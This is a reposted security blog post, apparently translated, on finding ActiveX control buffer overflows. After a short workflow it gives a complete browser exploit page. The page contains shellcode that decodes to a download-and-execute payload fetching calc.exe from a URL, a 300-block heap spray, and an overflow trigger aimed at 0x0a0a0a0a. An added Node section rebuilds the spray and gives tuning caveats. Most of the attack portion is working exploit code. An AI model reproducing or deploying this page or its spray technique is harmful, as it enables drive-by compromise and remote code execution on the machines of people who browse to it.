ActiveX control vulnerabilities have been reported in a steady stream lately, and there is no shortage of exploitation tools for them. The workflow for finding such bugs is summarized below:
(1) Download and install the software to be tested.
(2) Use COM Explorer to inspect the properties of the ActiveX controls it registers.
(3) Use the Visual Studio 2005 Object Browser to enumerate each control's properties, methods and method parameters, and pick out the parameters that may be vulnerable (typically string or buffer arguments that the control copies into fixed-size storage).
(4) Test the candidate parameters, for example by passing over-long input to each method while the browser runs under a debugger and watching for an access violation.
(5) Write the exploit page.
The page looks roughly like this (the CLSID is the control under test, and the shellcode bytes are abbreviated):
<html>
<body>
<!-- instantiate the target control; the CLSID identifies the control under test -->
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
<SCRIPT language="javascript">
// shellcode; its tail decodes to the strings "...FileA" and
// "http://127.0.0.1/calc.exe", i.e. a download-and-execute payload
var shellcode = unescape("%u9090"+"%u9090"+
"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
// ...(omitted)
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +
"%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");
// heap spray: 300 blocks of NOP sled + shellcode, each sized so that
// block + shellcode + string header fills 0x40000 UTF-16 units (0x80000 bytes)
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
// trigger: 4096 bytes of 0x0a so that the overwritten return address
// becomes 0x0a0a0a0a, an address inside the sprayed region
var buffer = '';
while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";
target.rawParse(buffer);
</script>
</body>
</html>
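The spray arithmetic in that page is easy to get subtly wrong (the loop has to end on exactly 0x40000 units, and the sled has to dominate each block), so here is the same construction as an added example that can be checked offline under Node. It is not code from the original post: the "shellcode" is a constructed placeholder of INT3 bytes, and the function names are assumptions of this example; the header budget of 20 units, the 0x40000-unit block size and the 0x0a filler are taken from the page.

```javascript
// Added example, not code from the original post: the page's heap-spray
// construction as functions whose sizes and layout can be checked offline.
// PLACEHOLDER_SHELLCODE is constructed (INT3 bytes), never a real payload,
// and every function name here is an assumption of this example.

// One UTF-16 unit carries two bytes; "\u9090" is two 0x90 (NOP) bytes,
// the same thing the page's unescape("%u9090") produces.
const NOP_UNIT = "\u9090";
// Units the page reserves for the JS string object header, so that
// sled + shellcode + header fills one allocation exactly.
const HEADER_UNITS = 20;
// Block size in UTF-16 units: 0x40000 units = 0x80000 bytes.
const BLOCK_UNITS = 0x40000;
// Constructed placeholder: 8 x 0xCC (INT3) bytes.
const PLACEHOLDER_SHELLCODE = "\ucccc\ucccc\ucccc\ucccc";

// Builds one spray block as the page does: a NOP sled followed by the
// shellcode, with sled + shellcode + header == blockUnits.
function buildSprayBlock(shellcode, headerUnits = HEADER_UNITS, blockUnits = BLOCK_UNITS) {
  const slackspace = headerUnits + shellcode.length;
  let bigblock = NOP_UNIT + NOP_UNIT;
  while (bigblock.length < slackspace) bigblock += bigblock;
  const fillblock = bigblock.substring(0, slackspace);
  let block = bigblock.substring(0, bigblock.length - slackspace);
  // (block + slackspace) starts as a power of two and doubles each
  // iteration, so the loop stops with block + slackspace == blockUnits.
  while (block.length + slackspace < blockUnits) block = block + block + fillblock;
  return block + shellcode;
}

// Allocates `count` blocks; in a browser these are what land in the heap.
function spray(shellcode, count = 300) {
  const memory = [];
  for (let x = 0; x < count; x++) memory.push(buildSprayBlock(shellcode));
  return memory;
}

// Byte layout of one block: sled first, shellcode last.
function blockLayout(block, shellcode) {
  const sledUnits = block.length - shellcode.length;
  return {
    sledBytes: sledUnits * 2,
    shellcodeBytes: shellcode.length * 2,
    totalBytes: block.length * 2,
  };
}

// Share of a block that is sled: the chance that a hijacked EIP landing
// at a random offset in the sprayed region slides into the shellcode
// rather than crashing inside the payload or the string header.
function sledFraction(block, shellcode) {
  const l = blockLayout(block, shellcode);
  return l.sledBytes / l.totalBytes;
}

// True when every unit before the shellcode is a NOP unit and the
// shellcode sits at the very end, which is what the sled relies on.
function isWellFormedBlock(block, shellcode) {
  if (!block.endsWith(shellcode)) return false;
  const sledUnits = block.length - shellcode.length;
  for (let i = 0; i < sledUnits; i++) {
    if (block[i] !== NOP_UNIT) return false;
  }
  return true;
}

// 32-bit little-endian value formed by an overflow filler, e.g. the
// page's "\x0a\x0a\x0a\x0a" -> 0x0a0a0a0a.
function addressFromFiller(bytes) {
  let addr = 0;
  for (let i = bytes.length - 1; i >= 0; i--) addr = addr * 256 + (bytes[i] & 0xff);
  return addr;
}

// The page's trigger buffer: `length` units of the filler pattern.
function buildTrigger(filler, length) {
  let buffer = "";
  while (buffer.length < length) buffer += filler;
  return buffer;
}

if (typeof require !== "undefined" && require.main === module) {
  const block = buildSprayBlock(PLACEHOLDER_SHELLCODE);
  console.log(blockLayout(block, PLACEHOLDER_SHELLCODE));
  console.log("sled fraction:", sledFraction(block, PLACEHOLDER_SHELLCODE));
  console.log("EIP from filler: 0x" + addressFromFiller([0x0a, 0x0a, 0x0a, 0x0a]).toString(16));
}
```

Two practical caveats the page leaves out: the sled covers more than 99.99% of each block only because the shellcode is tiny next to 0x80000 bytes, so a much larger payload lowers the odds that 0x0a0a0a0a lands on a NOP; and whether the 0x0a filler actually arrives as the dword 0x0a0a0a0a depends on how the control marshals its argument (a BSTR is UTF-16, so a control that copies the string without converting it to ANSI first would see 0x000a000a instead).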
This article is reposted from simeon2005's 51CTO blog; original link: http://blog.51cto.com/simeon/51083